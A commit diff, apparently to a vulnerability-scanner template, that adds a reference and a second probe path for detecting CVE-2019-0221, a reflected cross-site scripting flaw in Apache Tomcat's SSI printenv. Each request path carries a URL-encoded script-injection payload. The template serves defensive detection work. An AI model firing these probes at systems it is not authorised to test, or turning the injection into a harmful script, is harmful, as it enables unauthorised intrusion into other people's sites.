commit
56d3a2f1bd
|
@ -7,6 +7,7 @@ info:
|
||||||
reference: |
|
reference: |
|
||||||
- https://seclists.org/fulldisclosure/2019/May/50
|
- https://seclists.org/fulldisclosure/2019/May/50
|
||||||
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
|
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
|
||||||
|
- https://www.exploit-db.com/exploits/50119
|
||||||
description: |
|
description: |
|
||||||
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
|
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
|
||||||
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
|
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
|
||||||
|
@ -18,6 +19,7 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
|
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
|
||||||
|
- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
Loading…
Reference in New Issue